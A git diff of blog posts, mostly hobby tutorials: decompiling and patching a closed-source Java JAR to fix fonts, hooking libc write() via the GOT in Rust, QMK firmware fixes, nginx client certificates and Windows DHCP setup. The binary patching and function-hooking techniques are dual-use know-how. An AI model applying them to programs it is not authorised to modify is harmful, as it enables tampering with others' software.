This post was inspired by a *hypothetical* closed source piece of software from a hardware vendor, written in Java, which has unusable font rendering that makes it inaccessible to me. But I need to use it for class, so what am I to do? I want to write evil `LD_PRELOAD` hacks, but it's probably easier to patch the program itself, so that's what we're going to do.

I use IntelliJ IDEA for my Java work. It includes quite a nice Java decompiler, whose full functionality is (probably intentionally) not exposed to the user, but it includes a main class that lets us access it anyway.

First, make an IntelliJ project for your sources. Include all the libraries that they depend on. Now, time for some mild reversing!

Decompile the bad JAR file ([hat tip to StackOverflow](https://stackoverflow.com/q/28389006)):

```
PS> $p = 'C:\Program Files\JetBrains\IntelliJ IDEA Community Edition 2020.2.1\plugins\java-decompiler\lib\java-decompiler.jar'
PS> mkdir decomp
PS> java -cp $p org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler .\ProblemProgram.jar decomp
```

You will get a source JAR with all the sources in it, which you can unzip with whatever tool you prefer:

```
PS> Expand-Archive decomp/ProblemProgram.jar -dest src
```

You should now have all the files in your source directory and can work on them!

There are probably a pile of compile errors, because decompilers aren't perfect. They are, however, likely fairly easy to fix well enough to convince the project to build. In the tool I patched, the problems were primarily mysteriously inserted redefinitions and `javac` getting confused about generics.

### Time to patch!

The classes you are looking for subclass `JPanel` or similar AWT/Swing classes. They should have a `setFont` call you can patch, and an implementation of `paint(Graphics)`. First, patch the `setFont` in the sources to use a better font (because their choice is probably not good):

```java
this.setFont(new Font("Iosevka", 0, 14));
```

Then, for the magic incantations to patch the actual rendering ([thanks again, StackOverflow](https://stackoverflow.com/a/31537742)):

```java
// at the top of the file
import java.awt.Graphics2D;
import java.awt.RenderingHints;

// in paint(Graphics g)
((Graphics2D) g).setRenderingHint(RenderingHints.KEY_TEXT_ANTIALIASING, RenderingHints.VALUE_TEXT_ANTIALIAS_LCD_HRGB);
```

This enables subpixel antialiasing (which is superior to the default antialiasing type, which ends up rather blurry).

Recompile, and you can do the final stage of patching:

### Reincorporating the patches

You can use the `jar` tool included with your Java Development Kit to update the file. Note that the path to the class file must have the package name at its base:

```
# Make a backup!!
PS> cp ProblemProgram.jar ProblemProgram-orig.jar
# Patch it!
PS> jar uf ../ProblemProgram.jar com/problemcompany/problemprogram/UI.class
```

We replace only the class that is causing us problems, to reduce exposure to anything bad that happened in the round trip through the decompiler.

Now, for the result:

{{ image(alt="program showing a disassembly view with properly smooth fonts, in contrast to the header image with pixelated and unreadable fonts", name="jar-post.png") }}

### Bonus fun

Font rendering may not be the only thing wrong with this closed source program; you may also have to figure out some weird behaviours or find a configuration file. A debugger can be fantastically useful for this purpose, and IntelliJ provides quite a smooth experience debugging closed source code.

If you don't want to commit to fixing any decompilation errors, you can add the program's JAR as a library in `File>Project Structure` in IDEA, and it will let you set breakpoints in arbitrary class files without having to decompile and recompile them.

Run the program with a Java command similar to this:

```
PS> java '-agentlib:jdwp=transport=dt_socket,address=127.0.0.1:5678,server=y,suspend=y' -jar C:\ThatVendor\ProblematicProgram.jar
```

{% image(name="jar-configs.png") %}
Run/Debug Configurations window in IntelliJ IDEA with a remote configuration on port 5678, host localhost, debugger mode "Attach to Remote JVM", transport "Socket"
{% end %}

Once you have the configuration set up in IDEA, you can click the "Debug" button and it will connect to your JVM and start running the remote program.

### In case we're thinking of the same program from a blue FPGA vendor

`Monitor_Program/amp.config` has a setting `debug yes` to enable a debug console, though it doesn't have much of interest in it.

`monitor.properties` has a setting `YOURUSERNAME-enable-source-level-debugging` that, if disabled (as it seems to have done to itself initially), disables all the file-related functionality in the program, which is quite confusing indeed (and was the reason I first got out the decompiler).
237
content/posts/pwintln-uwu.md
Normal file
|
|
@ -0,0 +1,237 @@
|
||||||
|
+++
|
||||||
|
date = "2020-11-21"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/pwintln-uwu"
|
||||||
|
tags = ["rust", "linux"]
|
||||||
|
title = "pwintln uwu and other fun with elves and dynamic linkers"
|
||||||
|
+++
|
||||||
|
|
||||||
|
I recently was [brutally
|
||||||
|
nerdsniped](https://twitter.com/The6P4C/status/1329725624412381185) into
|
||||||
|
developing a [strange Rust library that turns prints into
|
||||||
|
uwu-speak](https://crates.io/crates/pwintln). I briefly considered writing a
|
||||||
|
proc macro but that was far too memory safe. It's doing-bad-things-to-binaries
|
||||||
|
time! (followed shortly by uwu time~!!)
|
||||||
|
|
||||||
|
I am going to use Linux because it's the platform I'm most comfortable doing
|
||||||
|
terrible things to.
|
||||||
|
|
||||||
|
I thought of a few strategies including inserting a breakpoint on the
|
||||||
|
`write(2)` routine in libc, but I figured I'd have to get the symbol anyway, so
|
||||||
|
messing with dynamic linking is probably the best strategy.
|
||||||
|
|
||||||
|
The way that dynamically linked symbols are handled *on my machine* for my Rust
executables is primarily through the `.rela.dyn` section. What this table
actually stores is the offsets from the base of the process image for function
pointers that are called indirectly when actually calling the function:

```
(gdb) si
0x000055555558126e  9  unsafe { libc::write(1, s.as_ptr() as *const c_void, s.to_bytes().len()) };
   0x0000555555581267 <_ZN7pwintln4main17hef045d1a4d1daed3E+23>: 48 8d 35 ea 7d 0e 00  lea  rsi,[rip+0xe7dea]  # 0x555555669058
=> 0x000055555558126e <_ZN7pwintln4main17hef045d1a4d1daed3E+30>: ba 14 00 00 00        mov  edx,0x14
   0x0000555555581273 <_ZN7pwintln4main17hef045d1a4d1daed3E+35>: bf 01 00 00 00        mov  edi,0x1
   0x0000555555581278 <_ZN7pwintln4main17hef045d1a4d1daed3E+40>: ff 15 72 5c 17 00     call QWORD PTR [rip+0x175c72]  # 0x5555556f6ef0
```
This form of the call instruction, for those who are unfamiliar, dereferences
the pointer `[rip + 0x175c72]` then calls the resulting address. So, if we want
to redirect execution, we can replace the address in memory at `0x5555556f6ef0`
with a pointer to our own function!
The way the dynamic linker knows where to put this pointer is by looking it up
in the relocations table, which you can see with `readelf -r`. In particular,
we find that `0x5555556f6ef0 = PROG_BASE + 0x1a2ef0`.

```
dev/pwintln » readelf -r target/release/pwintln
Relocation section '.rela.dyn' at offset 0x11a0 contains 7458 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
00000017e9c0  000000000008 R_X86_64_RELATIVE                    f94e0
00000017e9c8  000000000008 R_X86_64_RELATIVE                    2d160
00000017e9d0  000000000008 R_X86_64_RELATIVE                    2d110
< ...           ...          ...               ...              ... >
0000001a2ea8  004400000006 R_X86_64_GLOB_DAT 0000000000000000 pthread_mutexattr_init@GLIBC_2.2.5 + 0
0000001a2ec0  004500000006 R_X86_64_GLOB_DAT 0000000000000000 pthread_key_create@GLIBC_2.2.5 + 0
0000001a2ee8  004600000006 R_X86_64_GLOB_DAT 0000000000000000 pthread_mutex_destroy@GLIBC_2.2.5 + 0
0000001a2ef0  004700000006 R_X86_64_GLOB_DAT 0000000000000000 write@GLIBC_2.2.5 + 0
0000001a2f28  004900000006 R_X86_64_GLOB_DAT 0000000000000000 sigaltstack@GLIBC_2.2.5 + 0
0000001a2f40  004a00000006 R_X86_64_GLOB_DAT 0000000000000000 pthread_mutex_unlock@GLIBC_2.2.5 + 0
0000001a2f48  004b00000006 R_X86_64_GLOB_DAT 0000000000000000 memcpy@GLIBC_2.14 + 0
0000001a2f68  004c00000006 R_X86_64_GLOB_DAT 0000000000000000 open@GLIBC_2.2.5 + 0
0000001a2f88  004d00000006 R_X86_64_GLOB_DAT 0000000000000000 mmap@GLIBC_2.2.5 + 0
0000001a2f98  004e00000006 R_X86_64_GLOB_DAT 0000000000000000 _Unwind_SetIP@GCC_3.0 + 0

Relocation section '.rela.plt' at offset 0x2ccd0 contains 4 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
0000001a11d8  001000000007 R_X86_64_JUMP_SLO 0000000000000000 __register_atfork@GLIBC_2.3.2 + 0
0000001a11e0  001900000007 R_X86_64_JUMP_SLO 0000000000000000 __fxstat64@GLIBC_2.2.5 + 0
0000001a11e8  002300000007 R_X86_64_JUMP_SLO 0000000000000000 __tls_get_addr@GLIBC_2.3 + 0
0000001a11f0  004800000007 R_X86_64_JUMP_SLO 0000000000000000 _Unwind_Resume@GCC_3.0 + 0
```
Here, we show the process of poking at the symbol in a different way: first, we
get the program base with `info proc mappings` (the first line). Then, we look
at the memory at `PROG_BASE + 0x1a1ef0`, then interpret the quad-word we find
there as a pointer, dereferencing it and looking at the disassembly at its
target. We find libc code for `write(2)` here!

```
dev/pwintln » gdb target/release/pwintln
(gdb) info proc map
process 26676
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x555555554000     0x555555581000    0x2d000        0x0 /home/jade/dev/pwintln/target/release/pwintln
      0x555555581000     0x555555668000    0xe7000    0x2d000 /home/jade/dev/pwintln/target/release/pwintln
      0x555555668000     0x5555556d1000    0x69000   0x114000 /home/jade/dev/pwintln/target/release/pwintln
< ...                 ...                ...        ... >
(gdb) x/gx 0x555555554000 + 0x1a1ef0
0x5555556f5ef0: 0x00007ffff7ec4f50
(gdb) x/10i 0x00007ffff7ec4f50
   0x7ffff7ec4f50 <write>:      endbr64
   0x7ffff7ec4f54 <write+4>:    mov    eax,DWORD PTR fs:0x18
   0x7ffff7ec4f5c <write+12>:   test   eax,eax
   0x7ffff7ec4f5e <write+14>:   jne    0x7ffff7ec4f70 <write+32>
   0x7ffff7ec4f60 <write+16>:   mov    eax,0x1
   0x7ffff7ec4f65 <write+21>:   syscall
   0x7ffff7ec4f67 <write+23>:   cmp    rax,0xfffffffffffff000
   0x7ffff7ec4f6d <write+29>:   ja     0x7ffff7ec4fc0 <write+112>
   0x7ffff7ec4f6f <write+31>:   ret
   0x7ffff7ec4f70 <write+32>:   sub    rsp,0x28
```
So, we know what we want to hack and how we want to hack it, but how do we find
these pointers exactly? Well, we could [consult
StackOverflow](https://stackoverflow.com/a/27304692) but the answer is some
fairly ugly C.
Rust will mostly save us from much of the uglier pointer code, and the
[`goblin`](https://docs.rs/goblin) crate makes a lot of the ELF code much
more pleasant.
Linux provides us the libc function `getauxval(3)`, which will retrieve various
bits of information that the kernel's ELF loader thinks were good. The most
relevant one to figuring out where our program is loaded is
`getauxval(AT_PHDR)`, which gives us the address of our `Elf64_Phdr` structures,
which will in turn have their own virtual address offset from the base. We can
subtract that offset to get the base of where our executable was loaded.
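A sketch of that calculation (assuming x86_64 Linux with glibc; the auxv keys
and the `PT_PHDR`/`p_vaddr` offsets are the `<elf.h>` values, and `getauxval`
is declared by hand here rather than pulled in from the `libc` crate):

```rust
extern "C" {
    fn getauxval(ty: u64) -> u64;
}

// auxv keys and the PT_PHDR segment type, from <elf.h>.
const AT_PHDR: u64 = 3;
const AT_PHENT: u64 = 4;
const AT_PHNUM: u64 = 5;
const PT_PHDR: u32 = 6;

/// Find the load base: the PT_PHDR entry records the virtual address the
/// program headers would have at link time; the difference between that and
/// where they actually sit in memory is the base (ASLR slide).
fn program_base() -> Option<usize> {
    unsafe {
        let phdr = getauxval(AT_PHDR) as usize;
        let phent = getauxval(AT_PHENT) as usize;
        let phnum = getauxval(AT_PHNUM) as usize;
        for i in 0..phnum {
            let hdr = phdr + i * phent;
            let p_type = *(hdr as *const u32);
            if p_type == PT_PHDR {
                // p_vaddr is at offset 16: after p_type (4), p_flags (4), p_offset (8).
                let p_vaddr = *((hdr + 16) as *const u64) as usize;
                return Some(phdr - p_vaddr);
            }
        }
        None
    }
}

fn main() {
    let base = program_base().expect("no PT_PHDR?");
    // Mappings are page-aligned, so the base must be too.
    assert_eq!(base % 4096, 0);
    println!("loaded at {:#x}", base);
}
```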
Side note: if you want to read preprocessor-infested C code and headers as
their concrete representation, you can do something like this:

```
~ » cpp /usr/include/link.h | grep -B10 Elf64_Phdr
typedef struct
{
    Elf64_Word p_type;
    Elf64_Word p_flags;
    Elf64_Off p_offset;
    Elf64_Addr p_vaddr;
    Elf64_Addr p_paddr;
    Elf64_Xword p_filesz;
    Elf64_Xword p_memsz;
    Elf64_Xword p_align;
} Elf64_Phdr;
```
Once we have that header, we can calculate memory addresses to other structures
in the ELF. I use
[`dyn64::from_phdrs(base: usize, headers: &[ProgramHeader])`](https://docs.rs/goblin/0.2.3/goblin/elf/dynamic/dyn64/fn.from_phdrs.html)
which looks for a program header with `p_type == PT_DYNAMIC`, then uses that
address and length to make a slice of `Dyn` (`Elf64_Dyn` in C) structures.

This is a pile of tagged pointers to various bits related to dynamic linking:

```
dev/pwintln » readelf -d target/debug/pwintln

Dynamic section at offset 0x4bb6c8 contains 32 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libgcc_s.so.1]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x0000000000000001 (NEEDED)             Shared library: [ld-linux-x86-64.so.2]
 0x0000000000000001 (NEEDED)             Shared library: [libm.so.6]
 0x0000000000000001 (NEEDED)             Shared library: [libpthread.so.0]
 0x0000000000000001 (NEEDED)             Shared library: [libdl.so.2]
 0x000000000000000c (INIT)               0x68000
 0x000000000000000d (FINI)               0x3a9424
 0x0000000000000019 (INIT_ARRAY)         0x490f00
 0x000000000000001b (INIT_ARRAYSZ)       16 (bytes)
 0x000000000000001a (FINI_ARRAY)         0x490f10
 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
 0x000000006ffffef5 (GNU_HASH)           0x340
 0x0000000000000005 (STRTAB)             0xad0
 0x0000000000000006 (SYMTAB)             0x368
 0x000000000000000a (STRSZ)              1331 (bytes)
 0x000000000000000b (SYMENT)             24 (bytes)
 0x0000000000000015 (DEBUG)              0x0
 0x0000000000000003 (PLTGOT)             0x4bc908
 0x0000000000000002 (PLTRELSZ)           96 (bytes)
 0x0000000000000014 (PLTREL)             RELA
```
For whatever reason, when they are actually loaded into memory, they are
resolved to actual pointers rather than the offsets we see here. In any case,
this is how you find the various bits you need next:

- dynamic symbol table
- string table
- Rela relocations table (`.rela.dyn`)
We can walk through the `Rela` table (storing tuples of `(offset, info,
addend)`), an array of `Elf64_Rela` in C, to find the symbol we're looking for.
To find things in it, such as our `write` we want to hack, we have to resolve
the names of the symbols, so let's get started on that.

The `info` field is a packed 64 bit integer with the index into the symbol
table in the upper 32 bits. The rest of the structure we can just ignore.
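For example, unpacking `write`'s entry from the readelf dump above (a sketch;
its `Info` column there reads `004700000006`):

```rust
// Unpack the `r_info` field of an Elf64_Rela entry: the symbol-table index is
// the upper 32 bits; the relocation type (e.g. R_X86_64_GLOB_DAT == 6) is the
// lower 32.
fn split_r_info(r_info: u64) -> (usize, u32) {
    ((r_info >> 32) as usize, (r_info & 0xffff_ffff) as u32)
}

fn main() {
    let (sym_index, reloc_type) = split_r_info(0x0047_0000_0006);
    assert_eq!(sym_index, 0x47);
    assert_eq!(reloc_type, 6); // R_X86_64_GLOB_DAT
}
```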
Once we index into the symbol table (which mysteriously doesn't seem to have
any terribly accessible way to get a length for?? This project was intended as
a joke so I used more unsafe ✨✨), we can get a symbol record.

These symbol records (`Elf64_Sym`) have `st_name` and a bunch of other fields
we don't really care about. But, since this is ELF, there's more indirection!
The `st_name` is an offset into the strings table, which is a big packed
blob of null-terminated C strings. So, we either use some C string functions or
let `goblin`'s `Strtab` abstraction deal with it for us, to get the actual
string.
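Doing the lookup by hand is only a few lines; a sketch of what `Strtab` is
doing for us:

```rust
// A string-table lookup: `st_name` is a byte offset into a packed blob of
// NUL-terminated strings, so the name runs from that offset to the next NUL.
fn strtab_get(strtab: &[u8], st_name: usize) -> Option<&str> {
    let rest = strtab.get(st_name..)?;
    let end = rest.iter().position(|&b| b == 0)?;
    std::str::from_utf8(&rest[..end]).ok()
}

fn main() {
    // A toy string table: index 0 is conventionally the empty string.
    let strtab = b"\0write\0memcpy\0";
    assert_eq!(strtab_get(strtab, 1), Some("write"));
    assert_eq!(strtab_get(strtab, 7), Some("memcpy"));
}
```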
Now that we have the string, we can reject all the symbols we aren't looking
for.

We have reached the home stretch of getting the pointer we were looking for,
the offset of which is in the `Rela` from earlier, which we can add to the
program base to get our pointer.

Whew.

------------------

## Replacing the function with our own

This part is much easier. We need to write an `extern "C"` function in Rust
that has the same signature as `write(2)` in `libc` (note that at this machine
level, there is no type system; so if we mess up, it might crash horribly or
do other UB. Fun!)
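A minimal sketch of such a replacement (the names `REAL_WRITE`, `fake_write`,
and `stub_write` are mine, not the pwintln crate's; here the "real" write is
stood in for by a harmless stub so the dispatch can be demonstrated without
patching anything):

```rust
use std::sync::atomic::{AtomicUsize, Ordering};

// Where the pointer to the original function gets squirreled away.
static REAL_WRITE: AtomicUsize = AtomicUsize::new(0);

// write(2)'s ABI: (int fd, const void *buf, size_t count) -> ssize_t.
type WriteFn = unsafe extern "C" fn(i32, *const u8, usize) -> isize;

unsafe extern "C" fn fake_write(fd: i32, buf: *const u8, count: usize) -> isize {
    // ... uwu-ify the buffer here ...
    let real: WriteFn = std::mem::transmute(REAL_WRITE.load(Ordering::SeqCst));
    real(fd, buf, count)
}

// Stand-in for the saved libc pointer: pretends the write succeeded.
unsafe extern "C" fn stub_write(_fd: i32, _buf: *const u8, count: usize) -> isize {
    count as isize
}

fn main() {
    REAL_WRITE.store(stub_write as usize, Ordering::SeqCst);
    let n = unsafe { fake_write(1, b"uwu".as_ptr(), 3) };
    assert_eq!(n, 3);
}
```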
Once we have this function, we can replace it by putting a pointer to it at the
address we found earlier. This might require redoing the memory protection on
the page with `mprotect(2)` to allow reading and writing to it, because
"security" or some other similar good idea.

Store off the address to the real `write(2)` into some static (bonus points for
atomics), and replace the existing pointer.
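A sketch of the patch itself (assuming 4 KiB pages and the x86_64 Linux values
of `PROT_READ`/`PROT_WRITE` from `<sys/mman.h>`; `mprotect` is declared by
hand rather than taken from the `libc` crate, and a `static mut` plays the
role of the relocation slot):

```rust
extern "C" {
    fn mprotect(addr: *mut u8, len: usize, prot: i32) -> i32;
}

const PROT_READ: i32 = 1;
const PROT_WRITE: i32 = 2;
const PAGE_SIZE: usize = 4096;

/// Make the page containing `addr` read-write, then swap in `new`, returning
/// the old pointer so it can be stashed for calling the real function later.
unsafe fn patch_pointer(addr: *mut usize, new: usize) -> usize {
    // Round down to the containing page; mprotect wants a page boundary.
    let page = (addr as usize) & !(PAGE_SIZE - 1);
    let rc = mprotect(page as *mut u8, PAGE_SIZE, PROT_READ | PROT_WRITE);
    assert_eq!(rc, 0, "mprotect failed");
    let old = addr.read();
    addr.write(new);
    old
}

// A stand-in slot in writable memory, playing the role of the GOT entry.
static mut SLOT: usize = 0xdead;

fn main() {
    unsafe {
        let old = patch_pointer(std::ptr::addr_of_mut!(SLOT), 0xbeef);
        assert_eq!(old, 0xdead);
        assert_eq!(std::ptr::addr_of!(SLOT).read(), 0xbeef);
    }
}
```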
We can then implement the wrapper using the function pointer we squirreled
away, to do whatever nefarious things we want.

uwu ✨

The crate I am writing this post about is [on
GitHub here](https://github.com/lf-/pwintln). Have fun in your future binary
spelunking adventures!
104
content/posts/qmk-hacking.md
Normal file

@ -0,0 +1,104 @@
+++
date = "2020-05-22"
draft = false
path = "/blog/qmk-hacking"
tags = ["qmk", "keyboards", "software"]
title = "What I learned doing some casual QMK hacking"
featuredImage = "../images/new-keyboard.jpg"
+++
I recently acquired a new keyboard, which was a Whole Thing (tm) as I ordered
it right at the end of Chinese New Year's, in time for the entire country to be
locked down for COVID-19 reasons, so it ended up turning up yesterday, three
months later. It's a KBDFans DZ60 in an extremely normal layout, with Kailh Box
Brown switches. I bought it to replace my Unicomp keyboard, which mostly fit my
requirements but took up too much space on my desk and only properly handles
two keypresses at once, which is annoying for even the minimal gaming I do.
The main attraction of this keyboard is that it runs qmk firmware, the same
software I run on my [macro pad](./i-designed-and-built-a-mechanical-macropad-numpad),
meaning I can do pretty extensive firmware modifications to it. For instance,
on that device, I implemented an autoclicker in firmware. It allows for
multipurpose keys such as using caps lock as escape and control in firmware
such that there are no issues with some applications using raw input as I
experienced while using [`uncap`](https://github.com/susam/uncap).
One major feature I wanted to bring over from the macro pad project was the
custom static light patterns. This is a feature that qmk itself doesn't have a
fantastic story for, so I had to implement it for myself on that platform.
However, my existing implementation had several annoying flaws: at anything
except the lowest brightness, the colours were very washed out (a bug), and it
sometimes got confused and emitted bad output, which was exacerbated by the new
board having 16 LEDs.
The existing system used a qmk function designed for typical use cases for
setting individual RGB LEDs such as for indicating whether the various lock
keys are on. This had a bug in it which I was very confused about on the
initial implementation on my macro pad: sometimes the LEDs would not turn on as
they should, or they would skip some. However, this was only exposed because I
had accidentally activated on both key press and release events on my custom
keys, causing the light updates to be hit in quick succession. Once I fixed
that unrelated bug, I thought it was fixed. This bug returned on the new
system, yet when I introduced debug statements to see what the LEDs were being
set to, it stopped happening, though I found another bug.
Learning 1: negative values for unsigned types in C behave differently than I
expected. I was using -1 as a sentinel value for LEDs which are off, since it
was outside the range I believed the variable had. However, for some reason, it
was failing to hit a branch based on that value. I need to further investigate
this; it might have something to do with literal type.
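The wrapping itself is easy to demonstrate (sketched in Rust here, where the
conversions C performs implicitly have to be spelled out; the arithmetic is
the same):

```rust
fn main() {
    // In C, `uint8_t x = -1;` converts -1 modulo 2^8, so the stored sentinel
    // is actually 255.
    let sentinel: u8 = (-1i32) as u8;
    assert_eq!(sentinel, 255);

    // And a C comparison like `x == -1` promotes the uint8_t to int first,
    // comparing 255 against -1 — which never matches.
    assert_ne!(sentinel as i32, -1);
}
```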
About this time, I remembered the issue on the macro pad implementation and
assumed it was a timing issue since it happened less with the debug prints, so
I added delays, which fixed the problem. Talking with some very helpful people
on the qmk Discord, I learned that the function I was using to set the LED
values was sending out the entire string of LEDs' values on every call, which
was unnecessary since I was updating all of them and it would suffice to send
them all at once. I had read the source code for the LED system but thought I
could not interact closely enough with the internals to do this update all at
once; however, since I last worked with it, [that possibility was even
documented](https://docs.qmk.fm/#/feature_rgblight?id=low-level-functions).
Learning 2: if something is confusing, ask about it and reread the code again.
I thought that the internal state of this module was not `extern` when it
actually was, enabling me to set the LED states then send them all at once by
working with a lower-level API.
There still remained the issue of the desaturated colours. I was struggling
with this on the previous implementation and just assumed that the LEDs were
really bad at colour reproduction. Eventually, after reading some documentation,
I noticed that the qmk project ships with constants for various colours and
they were -completely- different from the ones I was using. For context, the
light pattern feature uses Hue-Saturation-Value colours so that brightness can
be adjusted by changing the value component while retaining the same colour.
Typically, this is represented with hue as a rotation of the colour wheel from
0 to 360 degrees, a saturation of 0-100% and a value from 0-100%. If I had
looked at the data types that the functions accepted more closely, I would have
likely noticed that the hue was a uint8_t, too small to represent the 360
degrees. However, I neglected to do that and instead passed in a uint16_t,
which was truncated, much to my confusion, when all my colours were wrong.
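The truncation is mechanical enough to demonstrate (again sketched in Rust; in
the C firmware the conversion happens implicitly at the call site):

```rust
fn main() {
    // Passing a 0-360 degree hue where a uint8_t is expected silently keeps
    // only the low 8 bits: 360 mod 256 == 104, a completely different hue.
    assert_eq!(360u16 as u8, 104);

    // Rescaling degrees into a 0-255 range first gives the intended hue.
    let degrees: u32 = 360;
    let hue = (degrees * 255 / 360) as u8;
    assert_eq!(hue, 255);
}
```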
Learning 3: When calling C APIs, quickly use `ctags` to double check the
parameter types. C has very loose casting rules that can permit bugs and
misunderstandings to compile when they should not.
Learning 3.5: Apparently you can use floating point in constants in C without
requiring that the entire program be compiled with floating point. This was
useful for converting colour ranges without pointless loss of precision:
multiply by the ratio in floating point, then cast back to an
integer. I confirmed this with [godbolt.org](https://godbolt.org) and staring
momentarily at the generated assembly.
I fixed my colours so they were the right hue, but they still were just various
shades of white. This is where I stared at the constants again and realized
that *both hue and saturation* were values from 0-255 in qmk. Oops. Another
scaling to the rescue. The lack of obvious indication that the values had this
range in the documentation is probably a flaw and I intend to submit a patch to
fix it.
Why would I do all this work? I wanted to practice my C. Also, putting pride
flags in unusual places is fun and validating.

You can look at the source of my changes [on
GitHub](https://github.com/lf-/qmk_firmware/tree/em-dz60)
33
content/posts/rewriting-the-blog-in-gatsby.md
Normal file

@ -0,0 +1,33 @@
+++
date = "2019-11-11"
draft = false
path = "/blog/rewriting-the-blog-in-gatsby"
tags = ["web", "javascript"]
title = "Rewriting the blog in Gatsby"
+++
I just rewrote the formerly-Ghost blog in Gatsby, which may improve performance, will definitely improve image loading, and will substantially simplify maintenance. A significant motivation was that maintaining a database is a pain, especially on Arch Linux where I have to do migrations on a somewhat unplanned schedule, on pace with the release schedule of the database system. A further annoyance is that if I don't update my Ghost version, there is potential for security vulnerabilities and server compromise. It's not as bad as WordPress, being written in NodeJS, but it is still a risk.

<!-- excerpt -->

It's a significant improvement to no longer have dynamic code running server side and to be able to just ship a pile of static code, which I can version using git and update the core when I want without substantial concern for security issues.

In summary, getting rid of the server side stuff:
- saves sysadmin time
- eliminates attack surface
- eliminates services such as database and email
- improves versioning and resilience to data loss by inherently having backups
- produces a more comfortable paradigm to develop for due to substantially better tooling
- avoids the need to remake my obsolescent Ghost theme that lacks support for the latest Ghost features

I chose Gatsby because it makes it easy to abstract away modern web stuff such as image processing/compression, but more importantly it is gratuitously novel and thus fun to develop with.

This theme is based on [gatsby-starter-julia](https://github.com/niklasmtj/gatsby-starter-julia), with modifications including adding a dark theme, featured images, support for non-post pages such as the About page here, changing a bunch of styles, and setting up image compression stuff.

Gatsby was also chosen so I could write posts in Markdown in my preferred editor.

### Importing posts

I had a bunch of existing content I wanted to migrate over, and I didn't really want to do manual work for each post, with the associated possibility for error. There didn't seem to be any options for those who just want to replace Ghost with plain Markdown within the Gatsby ecosystem, though there seem to be a lot of resources for headless Ghost. However, I noticed there is [ghostToHugo](https://github.com/jbarone/ghostToHugo), which can dump the posts out of a Ghost export and turn them all into Markdown with proper frontmatter. This was sort of annoying to use because I had to install Hugo, make a site, run the program to convert all the posts from the Ghost backup, then pull all the Markdown files out of that site and move them to Gatsby.

Also, somewhat annoyingly, since Hugo uses `toml` for its frontmatter, I needed to adjust the configuration of `gray-matter` in order to get it to parse `toml` rather than `yaml`, which was a large amount of documentation-reading but feasible.
@ -0,0 +1,64 @@

+++
author = "lf"
categories = ["homelab", "nginx", "tls"]
date = 2016-10-13T06:27:13Z
description = ""
draft = false
path = "/blog/setting-up-client-certs-for-secure-remote-access-to-home-lab-services"
tags = ["homelab", "nginx", "tls"]
title = "Setting up client certs for secure remote access to home lab services"
+++
Because I have some masochistic tendencies at times, I decided that it was a *totally good idea*™ to set up client certificate authentication to secure remote access to my lab services such as Grafana or Guacamole.

Unsurprisingly, since it's a rather uncommonly used, finicky authentication method, there were problems. There were quite a few.

I'm writing this post mostly just for myself if I ever do this again, because it felt like it took too long to accomplish.

First, the list of requirements:

* Should allow access without certs on the local network

* Should use nginx

The latter was pretty easy, since I'm most familiar with nginx; however, the former was rather interesting. I realized that, to implement this, I needed to set verification as optional, then enforce it manually. This meant modifying the back ends (meaning maintaining patches, nope!) or doing it within nginx.

One issue is that nginx has if statements that are rather strange, presumably due to a simplistic grammar for parsing the configuration. There is no way to do an and statement without hacks. The hack that I chose to use was some variable concatenation (which cannot be done in a single line on the if statement; it must be in its own separate if statement). Here's how I enforce certs from non-LAN hosts:

```
if ( $ssl_client_verify != "SUCCESS" ) {
    set $clientfail "F";
}
if ( $client_loc = "OUT" ) {
    set $clientfail "${clientfail}F";
}
if ( $clientfail = "FF" ) {
    return 401;
}
```
`$client_loc` is defined in a geo block:

```
geo $client_loc {
    default OUT;
    10.10.0.0/16 IN;
    10.11.0.0/16 IN;
}
```
But defining `ssl_client_certificate` and setting up the clients would be too easy. In setting this up, I learned that nginx has an error message: "The SSL certificate error". Yes. That's an error message. It's so bad that it could be written by Microsoft. Fortunately, it's very simple to just write an `error_log logs/debug.log debug` and get some slightly less cryptic details.

The big thing that tripped me up with the server setup was that `ssl_verify_depth` is set by default such that with a Root→Intermediate→Client hierarchy, clients fail to be verified. Set it to something like 3 and it will work.

Next, for the certificate setup:

The server directive `ssl_client_certificate` needs to point to a chain certificate file, or else it will fail with an error that suggests problems with the server certificate (thankfully).

The clients (for now, Chrome on Linux) need a pkcs12 file with some chain-like stuff in it. Generate one with something like:

```
openssl pkcs12 -in client-chain.cert.pem -out client.pfx -inkey client.key.pem -export
```
where `client-chain.cert.pem` is a full chain from client to root CA and `client.key.pem` is a key file.

The other issue with the clients was that they didn't trust my CA that was imported as part of the pfx file to authenticate servers. This was quickly solved with a trip to the CA tab in the Chrome cert settings.

The client certs used in this were from my CA and have the Client Authentication property enabled.
42
content/posts/setting-up-dhcp-on-a-dc.md
Normal file

@ -0,0 +1,42 @@
+++
author = "lf"
categories = ["PowerShell", "Active Directory", "dhcp", "dns"]
date = 2015-11-14T22:20:48Z
description = ""
draft = false
path = "/blog/setting-up-dhcp-on-a-dc"
tags = ["PowerShell", "Active Directory", "dhcp", "dns"]
title = "Setting up DHCP on a DC with secure dynamic DNS"
+++
So, in my virtual homelabbing, I decided I was going to get a Windows based network set up with more or less only PowerShell. In these efforts, I discovered a pretty poor pile of documentation (such as [this insanity](https://technet.microsoft.com/en-us/library/cc774834%28v=ws.10%29.aspx?f=255&MSPPError=-2147217396) where they tell you to create credentials with netsh, restart the service, then delete the credentials and restart again [optional step: wonder why it doesn't work]).

#### Here's how I set it up:
##### Create AD account:
```powershell
# Get username and password for the new account (remember to include your domain!)
$cred = Get-Credential

# Create the user (it needs no special permissions)
New-ADUser -Enabled $true -SamAccountName $cred.UserName -AccountPassword $cred.Password
```
##### Make the DHCP server use it:
```powershell
# Set the credentials for the DHCP server
Set-DhcpServerDnsCredential $cred

# Restart the DHCP Server
Restart-Service DhcpServer
```

You're set!

### Bonus:

Also remember to set the DNS server to only allow secure updates!

```powershell
Set-DnsServerPrimaryZone -DynamicUpdate Secure
```
@ -0,0 +1,16 @@

+++
author = "lf"
date = 2016-02-28T04:23:07Z
description = ""
draft = true
path = "/blog/setting-up-dynamic-ipv4-endpoint-update-for-tunnelbroker-on-asuswrt-merlin"
